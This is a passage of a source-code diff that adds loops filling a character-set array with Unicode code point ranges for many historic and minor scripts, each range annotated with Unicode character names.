+	while (c <= 0x10b7f)	// ..to INSCRIPTIONAL PAHLAVI NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10B80..10BAF; Psalter Pahlavi
+	c = 0x10b80;		// from PSALTER PAHLAVI LETTER ALEPH
+	while (c <= 0x10b91)	// ..to PSALTER PAHLAVI LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b99;		// from PSALTER PAHLAVI SECTION MARK
+	while (c <= 0x10b9c)	// ..to PSALTER PAHLAVI FOUR DOTS WITH DOT
+		charset[i++] = c++;
+	c = 0x10ba9;		// from PSALTER PAHLAVI NUMBER ONE
+	while (c <= 0x10baf)	// ..to PSALTER PAHLAVI NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 10C00..10C4F; Old Turkic
+	c = 0x10c00;		// from OLD TURKIC LETTER ORKHON A
+	while (c <= 0x10c48)	// ..to OLD TURKIC LETTER ORKHON BASH
+		charset[i++] = c++;
+// 10C80..10CFF; Old Hungarian
+	c = 0x10c80;		// from OLD HUNGARIAN CAPITAL LETTER A
+	while (c <= 0x10cb2)	// ..to OLD HUNGARIAN CAPITAL LETTER US
+		charset[i++] = c++;
+	c = 0x10cc0;		// from OLD HUNGARIAN SMALL LETTER A
+	while (c <= 0x10cf2)	// ..to OLD HUNGARIAN SMALL LETTER US
+		charset[i++] = c++;
+	c = 0x10cfa;		// from OLD HUNGARIAN NUMBER ONE
+	while (c <= 0x10cff)	// ..to OLD HUNGARIAN NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10D00..10D3F; Hanifi Rohingya
+	c = 0x10d00;		// from HANIFI ROHINGYA LETTER A
+	while (c <= 0x10d27)	// ..to HANIFI ROHINGYA SIGN TASSI
+		charset[i++] = c++;
+	c = 0x10d30;		// from HANIFI ROHINGYA DIGIT ZERO
+	while (c <= 0x10d39)	// ..to HANIFI ROHINGYA DIGIT NINE
+		charset[i++] = c++;
+// 10E60..10E7F; Rumi Numeral Symbols
+	c = 0x10e60;		// from RUMI DIGIT ONE
+	while (c <= 0x10e7e)	// ..to RUMI FRACTION TWO THIRDS
+		charset[i++] = c++;
+// 10F00..10F2F; Old Sogdian
+	c = 0x10f00;		// from OLD SOGDIAN LETTER ALEPH
+	while (c <= 0x10f27)	// ..to OLD SOGDIAN LIGATURE AYIN-DALETH
+		charset[i++] = c++;
+// 10F30..10F6F; Sogdian
+	c = 0x10f30;		// from SOGDIAN LETTER ALEPH
+	while (c <= 0x10f59)	// ..to SOGDIAN PUNCTUATION HALF CIRCLE WITH DOT
+		charset[i++] = c++;
+// 11000..1107F; Brahmi
+	c = 0x11000;		// from BRAHMI SIGN CANDRABINDU
+	while (c <= 0x1104d)	// ..to BRAHMI PUNCTUATION LOTUS
+		charset[i++] = c++;
+	c = 0x11052;		// from BRAHMI NUMBER ONE
+	while (c <= 0x1106f)	// ..to BRAHMI DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1107f;	// BRAHMI NUMBER JOINER
+// 11080..110CF; Kaithi
+	c = 0x11080;		// from KAITHI SIGN CANDRABINDU
+	while (c <= 0x110c1)	// ..to KAITHI DOUBLE DANDA
+		charset[i++] = c++;
+	charset[i++] = 0x110cd;	// KAITHI NUMBER SIGN ABOVE
+// 110D0..110FF; Sora Sompeng
+	c = 0x110d0;		// from SORA SOMPENG LETTER SAH
+	while (c <= 0x110e8)	// ..to SORA SOMPENG LETTER MAE
+		charset[i++] = c++;
+	c = 0x110f0;		// from SORA SOMPENG DIGIT ZERO
+	while (c <= 0x110f9)	// ..to SORA SOMPENG DIGIT NINE
+		charset[i++] = c++;
+// 11100..1114F; Chakma
+	c = 0x11100;		// from CHAKMA SIGN CANDRABINDU
+	while (c <= 0x11134)	// ..to CHAKMA MAAYYAA
+		charset[i++] = c++;
+	c = 0x11136;		// from CHAKMA DIGIT ZERO
+	while (c <= 0x11146)	// ..to CHAKMA VOWEL SIGN EI
+		charset[i++] = c++;
+// 11150..1117F; Mahajani
+	c = 0x11150;		// from MAHAJANI LETTER A
+	while (c <= 0x11176)	// ..to MAHAJANI LIGATURE SHRI
+		charset[i++] = c++;
+// 11180..111DF; Sharada
+	c = 0x11180;		// from SHARADA SIGN CANDRABINDU
+	while (c <= 0x111cd)	// ..to SHARADA SUTRA MARK
+		charset[i++] = c++;
+	c = 0x111d0;		// from SHARADA DIGIT ZERO
+	while (c <= 0x111df)	// ..to SHARADA SECTION MARK-2
+		charset[i++] = c++;
+// 111E0..111FF; Sinhala Archaic Numbers
+	c = 0x111e1;		// from SINHALA ARCHAIC DIGIT ONE
+	while (c <= 0x111f4)	// ..to SINHALA ARCHAIC NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 11200..1124F; Khojki
+	c = 0x11200;		// from KHOJKI LETTER A
+	while (c <= 0x11211)	// ..to KHOJKI LETTER JJA
+		charset[i++] = c++;
+	c = 0x11213;		// from KHOJKI LETTER NYA
+	while (c <= 0x1123e)	// ..to KHOJKI SIGN SUKUN
+		charset[i++] = c++;
+// 11280..112AF; Multani
+	c = 0x11280;		// from MULTANI LETTER A
+	while (c <= 0x11286)	// ..to MULTANI LETTER GA
+		charset[i++] = c++;
+	c = 0x1128a;		// from MULTANI LETTER CA
+	while (c <= 0x1128d)	// ..to MULTANI LETTER JJA
+		charset[i++] = c++;
+	c = 0x1128f;		// from MULTANI LETTER NYA
+	while (c <= 0x1129d)	// ..to MULTANI LETTER BA
+		charset[i++] = c++;
+	c = 0x1129f;		// from MULTANI LETTER BHA
+	while (c <= 0x112a9)	// ..to MULTANI SECTION MARK
+		charset[i++] = c++;
+// 112B0..112FF; Khudawadi
+	c = 0x112b0;		// from KHUDAWADI LETTER A
+	while (c <= 0x112ea)	// ..to KHUDAWADI SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0x112f0;		// from KHUDAWADI DIGIT ZERO
+	while (c <= 0x112f9)	// ..to KHUDAWADI DIGIT NINE
+		charset[i++] = c++;
+// 11300..1137F; Grantha
+	c = 0x11300;		// from GRANTHA SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0x11303)	// ..to GRANTHA SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x11305;		// from GRANTHA LETTER A
+	while (c <= 0x1130c)	// ..to GRANTHA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x1130f;	// GRANTHA LETTER EE
+	charset[i++] = 0x11310;	// GRANTHA LETTER AI
+	c = 0x11313;		// from GRANTHA LETTER OO
+	while (c <= 0x11328)	// ..to GRANTHA LETTER NA
+		charset[i++] = c++;
+	c = 0x1132a;		// from GRANTHA LETTER PA
+	while (c <= 0x11330)	// ..to GRANTHA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0x11332;	// GRANTHA LETTER LA
+	charset[i++] = 0x11333;	// GRANTHA LETTER LLA
+	c = 0x11335;		// from GRANTHA LETTER VA
+	while (c <= 0x11339)	// ..to GRANTHA LETTER HA
+		charset[i++] = c++;
+	c = 0x1133b;		// from COMBINING BINDU BELOW
+	while (c <= 0x11344)	// ..to GRANTHA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x11347;	// GRANTHA VOWEL SIGN EE
+	charset[i++] = 0x11348;	// GRANTHA VOWEL SIGN AI
+	charset[i++] = 0x1134b;	// GRANTHA VOWEL SIGN OO
+	charset[i++] = 0x1134d;	// GRANTHA SIGN VIRAMA
+	c = 0x1135d;		// from GRANTHA SIGN PLUTA
+	while (c <= 0x11363)	// ..to GRANTHA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x11366;		// from COMBINING GRANTHA DIGIT ZERO
+	while (c <= 0x1136c)	// ..to COMBINING GRANTHA DIGIT SIX
+		charset[i++] = c++;
+	c = 0x11370;		// from COMBINING GRANTHA LETTER A
+	while (c <= 0x11374)	// ..to COMBINING GRANTHA LETTER PA
+		charset[i++] = c++;
+// 11400..1147F; Newa
+	c = 0x11400;		// from NEWA LETTER A
+	while (c <= 0x11459)	// ..to NEWA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1145d;	// NEWA INSERTION SIGN
+	charset[i++] = 0x1145e;	// NEWA SANDHI MARK
+// 11480..114DF; Tirhuta
+	c = 0x11480;		// from TIRHUTA ANJI
+	while (c <= 0x114c7)	// ..to TIRHUTA OM
+		charset[i++] = c++;
+	c = 0x114d0;		// from TIRHUTA DIGIT ZERO
+	while (c <= 0x114d9)	// ..to TIRHUTA DIGIT NINE
+		charset[i++] = c++;
+// 11580..115FF; Siddham
+	c = 0x11580;		// from SIDDHAM LETTER A
+	while (c <= 0x115b5)	// ..to SIDDHAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	c = 0x115b8;		// from SIDDHAM VOWEL SIGN E
+	while (c <= 0x115dd)	// ..to SIDDHAM VOWEL SIGN ALTERNATE UU
+		charset[i++] = c++;
+// 11600..1165F; Modi
+	c = 0x11600;		// from MODI LETTER A
+	while (c <= 0x11644)	// ..to MODI SIGN HUVA
+		charset[i++] = c++;
+	c = 0x11650;		// from MODI DIGIT ZERO
+	while (c <= 0x11659)	// ..to MODI DIGIT NINE
+		charset[i++] = c++;
+// 11660..1167F; Mongolian Supplement
+	c = 0x11660;		// from MONGOLIAN BIRGA WITH ORNAMENT
+	while (c <= 0x1166c)	// ..to MONGOLIAN TURNED SWIRL BIRGA WITH DOUBLE ORNAMENT
+		charset[i++] = c++;
+// 11680..116CF; Takri
+	c = 0x11680;		// from TAKRI LETTER A
+	while (c <= 0x116b7)	// ..to TAKRI SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x116c0;		// from TAKRI DIGIT ZERO
+	while (c <= 0x116c9)	// ..to TAKRI DIGIT NINE
+		charset[i++] = c++;
+// 11700..1173F; Ahom
+	c = 0x11700;		// from AHOM LETTER KA
+	while (c <= 0x1171a)	// ..to AHOM LETTER ALTERNATE BA
+		charset[i++] = c++;
+	c = 0x1171d;		// from AHOM CONSONANT SIGN MEDIAL LA
+	while (c <= 0x1172b)	// ..to AHOM SIGN KILLER
+		charset[i++] = c++;
+	c = 0x11730;		// from AHOM DIGIT ZERO
+	while (c <= 0x1173f)	// ..to AHOM SYMBOL VI
+		charset[i++] = c++;
+// 11800..1184F; Dogra
+	c = 0x11800;		// from DOGRA LETTER A
+	while (c <= 0x1183b)	// ..to DOGRA ABBREVIATION SIGN
+		charset[i++] = c++;
+// 118A0..118FF; Warang Citi
+	c = 0x118a0;		// from WARANG CITI CAPITAL LETTER NGAA
+	while (c <= 0x118f2)	// ..to WARANG CITI NUMBER NINETY
+		charset[i++] = c++;
+	charset[i++] = 0x118ff;	// WARANG CITI OM
+// 11A00..11A4F; Zanabazar Square
+	c = 0x11a00;		// from ZANABAZAR SQUARE LETTER A
+	while (c <= 0x11a47)	// ..to ZANABAZAR SQUARE SUBJOINER
+		charset[i++] = c++;
+// 11A50..11AAF; Soyombo
+	c = 0x11a50;		// from SOYOMBO LETTER A
+	while (c <= 0x11a83)	// ..to SOYOMBO LETTER KSSA
+		charset[i++] = c++;
+	c = 0x11a86;		// from SOYOMBO CLUSTER-INITIAL LETTER RA
+	while (c <= 0x11aa2)	// ..to SOYOMBO TERMINAL MARK-2
+		charset[i++] = c++;
+// 11AC0..11AFF; Pau Cin Hau
+	c = 0x11ac0;		// from PAU CIN HAU LETTER PA
+	while (c <= 0x11af8)	// ..to PAU CIN HAU GLOTTAL STOP FINAL
+		charset[i++] = c++;
+// 11C00..11C6F; Bhaiksuki
+	c = 0x11c00;		// from BHAIKSUKI LETTER A
+	while (c <= 0x11c08)	// ..to BHAIKSUKI LETTER VOCALIC L
+		charset[i++] = c++;
+	c = 0x11c0a;		// from BHAIKSUKI LETTER E
+	while (c <= 0x11c36)	// ..to BHAIKSUKI VOWEL SIGN VOCALIC L
+		charset[i++] = c++;
+	c = 0x11c38;		// from BHAIKSUKI VOWEL SIGN E
+	while (c <= 0x11c45)	// ..to BHAIKSUKI GAP FILLER-2
+		charset[i++] = c++;
+	c = 0x11c50;		// from BHAIKSUKI DIGIT ZERO
+	while (c <= 0x11c6c)	// ..to BHAIKSUKI HUNDREDS UNIT MARK
+		charset[i++] = c++;
+// 11C70..11CBF; Marchen
+	c = 0x11c70;		// from MARCHEN HEAD MARK
+	while (c <= 0x11c8f)	// ..to MARCHEN LETTER A
+		charset[i++] = c++;
+	c = 0x11c92;		// from MARCHEN SUBJOINED LETTER KA
+	while (c <= 0x11ca7)	// ..to MARCHEN SUBJOINED LETTER ZA
+		charset[i++] = c++;
+	c = 0x11ca9;		// from MARCHEN SUBJOINED LETTER YA
+	while (c <= 0x11cb6)	// ..to MARCHEN SIGN CANDRABINDU
+		charset[i++] = c++;
+// 11D00..11D5F; Masaram Gondi
+	c = 0x11d00;		// from MASARAM GONDI LETTER A
+	while (c <= 0x11d06)	// ..to MASARAM GONDI LETTER E
+		charset[i++] = c++;
+	charset[i++] = 0x11d08;	// MASARAM GONDI LETTER AI
+	charset[i++] = 0x11d09;	// MASARAM GONDI LETTER O
+	c = 0x11d0b;		// from MASARAM GONDI LETTER AU
+	while (c <= 0x11d36)	// ..to MASARAM GONDI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	charset[i++] = 0x11d3c;	// MASARAM GONDI VOWEL SIGN AI
+	charset[i++] = 0x11d3d;	// MASARAM GONDI VOWEL SIGN O
+	c = 0x11d3f;		// from MASARAM GONDI VOWEL SIGN AU
+	while (c <= 0x11d47)	// ..to MASARAM GONDI RA-KARA
+		charset[i++] = c++;
+	c = 0x11d50;		// from MASARAM GONDI DIGIT ZERO
+	while (c <= 0x11d59)	// ..to MASARAM GONDI DIGIT NINE
+		charset[i++] = c++;
+// 11D60..11DAF; Gunjala Gondi
+	c = 0x11d60;		// from GUNJALA GONDI LETTER A
+	while (c <= 0x11d65)	// ..to GUNJALA GONDI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0x11d67;	// GUNJALA GONDI LETTER EE
+	charset[i++] = 0x11d68;	// GUNJALA GONDI LETTER AI
+	c = 0x11d6a;		// from GUNJALA GONDI LETTER OO
+	while (c <= 0x11d8e)	// ..to GUNJALA GONDI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0x11d90;	// GUNJALA GONDI VOWEL SIGN EE
+	charset[i++] = 0x11d91;	// GUNJALA GONDI VOWEL SIGN AI
+	c = 0x11d93;		// from GUNJALA GONDI VOWEL SIGN OO
+	while (c <= 0x11d98)	// ..to GUNJALA GONDI OM
+		charset[i++] = c++;
+	c = 0x11da0;		// from GUNJALA GONDI DIGIT ZERO
+	while (c <= 0x11da9)	// ..to GUNJALA GONDI DIGIT NINE
+		charset[i++] = c++;
+// 11EE0..11EFF; Makasar
+	c = 0x11ee0;		// from MAKASAR LETTER KA
+	while (c <= 0x11ef8)	// ..to MAKASAR END OF SECTION
+		charset[i++] = c++;
+// 12000..123FF; Cuneiform
+	c = 0x12000;		// from CUNEIFORM SIGN A
+	while (c <= 0x12399)	// ..to CUNEIFORM SIGN U U
+		charset[i++] = c++;
+// 12400..1247F; Cuneiform Numbers and Punctuation
+	c = 0x12400;		// from CUNEIFORM NUMERIC SIGN TWO ASH
+	while (c <= 0x1246e)	// ..to CUNEIFORM NUMERIC SIGN NINE U VARIANT FORM
+		charset[i++] = c++;
+	c = 0x12470;		// from CUNEIFORM PUNCTUATION SIGN OLD ASSYRIAN WORD DIVIDER
+	while (c <= 0x12474)	// ..to CUNEIFORM PUNCTUATION SIGN DIAGONAL QUADCOLON
+		charset[i++] = c++;
+// 12480..1254F; Early Dynastic Cuneiform
+	c = 0x12480;		// from CUNEIFORM SIGN AB TIMES NUN TENU
+	while (c <= 0x12543)	// ..to CUNEIFORM SIGN ZU5 TIMES THREE DISH TENU
+		charset[i++] = c++;
+// 13000..1342F; Egyptian Hieroglyphs
+	c = 0x13000;		// from EGYPTIAN HIEROGLYPH A001
+	while (c <= 0x1342e)	// ..to EGYPTIAN HIEROGLYPH AA032
+		charset[i++] = c++;
+// 14400..1467F; Anatolian Hieroglyphs
+	c = 0x14400;		// from ANATOLIAN HIEROGLYPH A001
+	while (c <= 0x14646)	// ..to ANATOLIAN HIEROGLYPH A530
+		charset[i++] = c++;
+// 16800..16A3F; Bamum Supplement
+	c = 0x16800;		// from BAMUM LETTER PHASE-A NGKUE MFON
+	while (c <= 0x16a38)	// ..to BAMUM LETTER PHASE-F VUEQ
+		charset[i++] = c++;
+// 16A40..16A6F; Mro
+	c = 0x16a40;		// from MRO LETTER TA
+	while (c <= 0x16a5e)	// ..to MRO LETTER TEK
+		charset[i++] = c++;
+	c = 0x16a60;		// from MRO DIGIT ZERO
+	while (c <= 0x16a69)	// ..to MRO DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x16a6e;	// MRO DANDA
+	charset[i++] = 0x16a6f;	// MRO DOUBLE DANDA
+// 16AD0..16AFF; Bassa Vah
+	c = 0x16ad0;		// from BASSA VAH LETTER ENNI
+	while (c <= 0x16aed)	// ..to BASSA VAH LETTER I
+		charset[i++] = c++;
+	c = 0x16af0;		// from BASSA VAH COMBINING HIGH TONE
+	while (c <= 0x16af5)	// ..to BASSA VAH FULL STOP
+		charset[i++] = c++;
+// 16B00..16B8F; Pahawh Hmong
+	c = 0x16b00;		// from PAHAWH HMONG VOWEL KEEB
+	while (c <= 0x16b45)	// ..to PAHAWH HMONG SIGN CIM TSOV ROG
+		charset[i++] = c++;
+	c = 0x16b50;		// from PAHAWH HMONG DIGIT ZERO
+	while (c <= 0x16b59)	// ..to PAHAWH HMONG DIGIT NINE
+		charset[i++] = c++;
+	c = 0x16b5b;		// from PAHAWH HMONG NUMBER TENS
+	while (c <= 0x16b61)	// ..to PAHAWH HMONG NUMBER TRILLIONS
+		charset[i++] = c++;
+	c = 0x16b63;		// from PAHAWH HMONG SIGN VOS LUB
+	while (c <= 0x16b77)	// ..to PAHAWH HMONG SIGN CIM NRES TOS
+		charset[i++] = c++;
+	c = 0x16b7d;		// from PAHAWH HMONG CLAN SIGN TSHEEJ
+	while (c <= 0x16b8f)	// ..to PAHAWH HMONG CLAN SIGN VWJ
+		charset[i++] = c++;
+// 16E40..16E9F; Medefaidrin
+	c = 0x16e40;		// from MEDEFAIDRIN CAPITAL LETTER M
+	while (c <= 0x16e9a)	// ..to MEDEFAIDRIN EXCLAMATION OH
+		charset[i++] = c++;
+// 16F00..16F9F; Miao
+	c = 0x16f00;		// from MIAO LETTER PA
+	while (c <= 0x16f44)	// ..to MIAO LETTER HHA
+		charset[i++] = c++;
+	c = 0x16f50;		// from MIAO LETTER NASALIZATION
+	while (c <= 0x16f7e)	// ..to MIAO VOWEL SIGN NG
+		charset[i++] = c++;
+	c = 0x16f8f;		// from MIAO TONE RIGHT
+	while (c <= 0x16f9f)	// ..to MIAO LETTER REFORMED TONE-8
+		charset[i++] = c++;
+// 16FE0..16FFF; Ideographic Symbols and Punctuation
+	charset[i++] = 0x16fe0;	// TANGUT ITERATION MARK
+	charset[i++] = 0x16fe1;	// NUSHU ITERATION MARK
+// 17000..187FF; Tangut
+	c = 0x17000;		// from <Tangut Ideograph, First>
+	while (c <= 0x187f1)	// ..to <Tangut Ideograph, Last>
+		charset[i++] = c++;
+// 18800..18AFF; Tangut Components
+	c = 0x18800;		// from TANGUT COMPONENT-001
+	while (c <= 0x18af2)	// ..to TANGUT COMPONENT-755
+		charset[i++] = c++;
+// 1B000..1B0FF; Kana Supplement
+	c = 0x1b000;		// from KATAKANA LETTER ARCHAIC E
+	while (c <= 0x1b0ff)	// ..to HENTAIGANA LETTER RE-2
+		charset[i++] = c++;
+// 1B100..1B12F; Kana Extended-A
+	c = 0x1b100;		// from HENTAIGANA LETTER RE-3
+	while (c <= 0x1b11e)	// ..to HENTAIGANA LETTER N-MU-MO-2
+		charset[i++] = c++;
+// 1B170..1B2FF; Nushu
+	c = 0x1b170;		// from NUSHU CHARACTER-1B170
+	while (c <= 0x1b2fb)	// ..to NUSHU CHARACTER-1B2FB
+		charset[i++] = c++;
+// 1BC00..1BC9F; Duployan
+	c = 0x1bc00;		// from DUPLOYAN LETTER H
+	while (c <= 0x1bc6a)	// ..to DUPLOYAN LETTER VOCALIC M
+		charset[i++] = c++;
+	c = 0x1bc70;		// from DUPLOYAN AFFIX LEFT HORIZONTAL SECANT
+	while (c <= 0x1bc7c)	// ..to DUPLOYAN AFFIX ATTACHED TANGENT HOOK
+		charset[i++] = c++;
+	c = 0x1bc80;		// from DUPLOYAN AFFIX HIGH ACUTE
+	while (c <= 0x1bc88)	// ..to DUPLOYAN AFFIX HIGH VERTICAL
+		charset[i++] = c++;
+	c = 0x1bc90;		// from DUPLOYAN AFFIX LOW ACUTE
+	while (c <= 0x1bc99)	// ..to DUPLOYAN AFFIX LOW ARROW
+		charset[i++] = c++;
+	c = 0x1bc9c;		// from DUPLOYAN SIGN O WITH CROSS
+	while (c <= 0x1bc9f)	// ..to DUPLOYAN PUNCTUATION CHINOOK FULL STOP
+		charset[i++] = c++;
+// 1BCA0..1BCAF; Shorthand Format Controls
+	c = 0x1bca0;		// from SHORTHAND FORMAT LETTER OVERLAP
+	while (c <= 0x1bca3)	// ..to SHORTHAND FORMAT UP STEP
+		charset[i++] = c++;
+// 1D000..1D0FF; Byzantine Musical Symbols
+	c = 0x1d000;		// from BYZANTINE MUSICAL SYMBOL PSILI
+	while (c <= 0x1d0f5)	// ..to BYZANTINE MUSICAL SYMBOL GORGON NEO KATO
+		charset[i++] = c++;
+// 1D100..1D1FF; Musical Symbols
+	c = 0x1d100;		// from MUSICAL SYMBOL SINGLE BARLINE
+	while (c <= 0x1d126)	// ..to MUSICAL SYMBOL DRUM CLEF-2
+		charset[i++] = c++;
+	c = 0x1d129;		// from MUSICAL SYMBOL MULTIPLE MEASURE REST
+	while (c <= 0x1d1e8)	// ..to MUSICAL SYMBOL KIEVAN FLAT SIGN
+		charset[i++] = c++;
+// 1D200..1D24F; Ancient Greek Musical Notation
+	c = 0x1d200;		// from GREEK VOCAL NOTATION SYMBOL-1
+	while (c <= 0x1d245)	// ..to GREEK MUSICAL LEIMMA
+		charset[i++] = c++;
+// 1D2E0..1D2FF; Mayan Numerals
+	c = 0x1d2e0;		// from MAYAN NUMERAL ZERO
+	while (c <= 0x1d2f3)	// ..to MAYAN NUMERAL NINETEEN
+		charset[i++] = c++;
+// 1D300..1D35F; Tai Xuan Jing Symbols
+	c = 0x1d300;		// from MONOGRAM FOR EARTH
+	while (c <= 0x1d356)	// ..to TETRAGRAM FOR FOSTERING
+		charset[i++] = c++;
+// 1D360..1D37F; Counting Rod Numerals
+	c = 0x1d360;		// from COUNTING ROD UNIT DIGIT ONE
+	while (c <= 0x1d378)	// ..to TALLY MARK FIVE
+		charset[i++] = c++;
+// 1D400..1D7FF; Mathematical Alphanumeric Symbols
+	c = 0x1d400;		// from MATHEMATICAL BOLD CAPITAL A
+	while (c <= 0x1d454)	// ..to MATHEMATICAL ITALIC SMALL G
+		charset[i++] = c++;
+	c = 0x1d456;		// from MATHEMATICAL ITALIC SMALL I
+	while (c <= 0x1d49c)	// ..to MATHEMATICAL SCRIPT CAPITAL A
+		charset[i++] = c++;
+	charset[i++] = 0x1d49e;	// MATHEMATICAL SCRIPT CAPITAL C
+	charset[i++] = 0x1d49f;	// MATHEMATICAL SCRIPT CAPITAL D
+	charset[i++] = 0x1d4a5;	// MATHEMATICAL SCRIPT CAPITAL J
+	charset[i++] = 0x1d4a6;	// MATHEMATICAL SCRIPT CAPITAL K
+	c = 0x1d4a9;		// from MATHEMATICAL SCRIPT CAPITAL N
+	while (c <= 0x1d4ac)	// ..to MATHEMATICAL SCRIPT CAPITAL Q
+		charset[i++] = c++;
+	c = 0x1d4ae;		// from MATHEMATICAL SCRIPT CAPITAL S
+	while (c <= 0x1d4b9)	// ..to MATHEMATICAL SCRIPT SMALL D
+		charset[i++] = c++;
+	c = 0x1d4bd;		// from MATHEMATICAL SCRIPT SMALL H
+	while (c <= 0x1d4c3)	// ..to MATHEMATICAL SCRIPT SMALL N
+		charset[i++] = c++;
+	c = 0x1d4c5;		// from MATHEMATICAL SCRIPT SMALL P
+	while (c <= 0x1d505)	// ..to MATHEMATICAL FRAKTUR CAPITAL B
+		charset[i++] = c++;
+	c = 0x1d507;		// from MATHEMATICAL FRAKTUR CAPITAL D
+	while (c <= 0x1d50a)	// ..to MATHEMATICAL FRAKTUR CAPITAL G
+		charset[i++] = c++;
+	c = 0x1d50d;		// from MATHEMATICAL FRAKTUR CAPITAL J
+	while (c <= 0x1d514)	// ..to MATHEMATICAL FRAKTUR CAPITAL Q
+		charset[i++] = c++;
+	c = 0x1d516;		// from MATHEMATICAL FRAKTUR CAPITAL S
+	while (c <= 0x1d51c)	// ..to MATHEMATICAL FRAKTUR CAPITAL Y
+		charset[i++] = c++;
+	c = 0x1d51e;		// from MATHEMATICAL FRAKTUR SMALL A
+	while (c <= 0x1d539)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL B
+		charset[i++] = c++;
+	c = 0x1d53b;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL D
+	while (c <= 0x1d53e)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL G
+		charset[i++] = c++;
+	c = 0x1d540;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL I
+	while (c <= 0x1d544)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL M
+		charset[i++] = c++;
+	c = 0x1d54a;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL S
+	while (c <= 0x1d550)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL Y
+		charset[i++] = c++;
+	c = 0x1d552;		// from MATHEMATICAL DOUBLE-STRUCK SMALL A
+	while (c <= 0x1d6a5)	// ..to MATHEMATICAL ITALIC SMALL DOTLESS J
+		charset[i++] = c++;
+	c = 0x1d6a8;		// from MATHEMATICAL BOLD CAPITAL ALPHA
+	while (c <= 0x1d7cb)	// ..to MATHEMATICAL BOLD SMALL DIGAMMA
+		charset[i++] = c++;
+	c = 0x1d7ce;		// from MATHEMATICAL BOLD DIGIT ZERO
+	while (c <= 0x1d7ff)	// ..to MATHEMATICAL MONOSPACE DIGIT NINE
+		charset[i++] = c++;
+// 1D800..1DAAF; Sutton SignWriting
+	c = 0x1d800;		// from SIGNWRITING HAND-FIST INDEX
+	while (c <= 0x1da8b)	// ..to SIGNWRITING PARENTHESIS
+		charset[i++] = c++;
+	c = 0x1da9b;		// from SIGNWRITING FILL MODIFIER-2
+	while (c <= 0x1da9f)	// ..to SIGNWRITING FILL MODIFIER-6
+		charset[i++] = c++;
+	c = 0x1daa1;		// from SIGNWRITING ROTATION MODIFIER-2
+	while (c <= 0x1daaf)	// ..to SIGNWRITING ROTATION MODIFIER-16
+		charset[i++] = c++;
+// 1E000..1E02F; Glagolitic Supplement
+	c = 0x1e000;		// from COMBINING GLAGOLITIC LETTER AZU
+	while (c <= 0x1e006)	// ..to COMBINING GLAGOLITIC LETTER ZHIVETE
+		charset[i++] = c++;
+	c = 0x1e008;		// from COMBINING GLAGOLITIC LETTER ZEMLJA
+	while (c <= 0x1e018)	// ..to COMBINING GLAGOLITIC LETTER HERU
+		charset[i++] = c++;
+	c = 0x1e01b;		// from COMBINING GLAGOLITIC LETTER SHTA
+	while (c <= 0x1e021)	// ..to COMBINING GLAGOLITIC LETTER YATI
+		charset[i++] = c++;
+	charset[i++] = 0x1e023;	// COMBINING GLAGOLITIC LETTER YU
+	charset[i++] = 0x1e024;	// COMBINING GLAGOLITIC LETTER SMALL YUS
+	c = 0x1e026;		// from COMBINING GLAGOLITIC LETTER YO
+	while (c <= 0x1e02a)	// ..to COMBINING GLAGOLITIC LETTER FITA
+		charset[i++] = c++;
+// 1E800..1E8DF; Mende Kikakui
+	c = 0x1e800;		// from MENDE KIKAKUI SYLLABLE M001 KI
+	while (c <= 0x1e8c4)	// ..to MENDE KIKAKUI SYLLABLE M060 NYON
+		charset[i++] = c++;
+	c = 0x1e8c7;		// from MENDE KIKAKUI DIGIT ONE
+	while (c <= 0x1e8d6)	// ..to MENDE KIKAKUI COMBINING NUMBER MILLIONS
+		charset[i++] = c++;
+// 1E900..1E95F; Adlam
+	c = 0x1e900;		// from ADLAM CAPITAL LETTER ALIF
+	while (c <= 0x1e94a)	// ..to ADLAM NUKTA
+		charset[i++] = c++;
+	c = 0x1e950;		// from ADLAM DIGIT ZERO
+	while (c <= 0x1e959)	// ..to ADLAM DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1e95e;	// ADLAM INITIAL EXCLAMATION MARK
+	charset[i++] = 0x1e95f;	// ADLAM INITIAL QUESTION MARK
+// 1EC70..1ECBF; Indic Siyaq Numbers
+	c = 0x1ec71;		// from INDIC SIYAQ NUMBER ONE
+	while (c <= 0x1ecb4)	// ..to INDIC SIYAQ ALTERNATE LAKH MARK
+		charset[i++] = c++;
+// 1EE00..1EEFF; Arabic Mathematical Alphabetic Symbols
+	c = 0x1ee00;		// from ARABIC MATHEMATICAL ALEF
+	while (c <= 0x1ee03)	// ..to ARABIC MATHEMATICAL DAL
+		charset[i++] = c++;
+	c = 0x1ee05;		// from ARABIC MATHEMATICAL WAW
+	while (c <= 0x1ee1f)	// ..to ARABIC MATHEMATICAL DOTLESS QAF
+		charset[i++] = c++;
+	charset[i++] = 0x1ee21;	// ARABIC MATHEMATICAL INITIAL BEH
+	charset[i++] = 0x1ee22;	// ARABIC MATHEMATICAL INITIAL JEEM
+	c = 0x1ee29;		// from ARABIC MATHEMATICAL INITIAL YEH
+	while (c <= 0x1ee32)	// ..to ARABIC MATHEMATICAL INITIAL QAF
+		charset[i++] = c++;
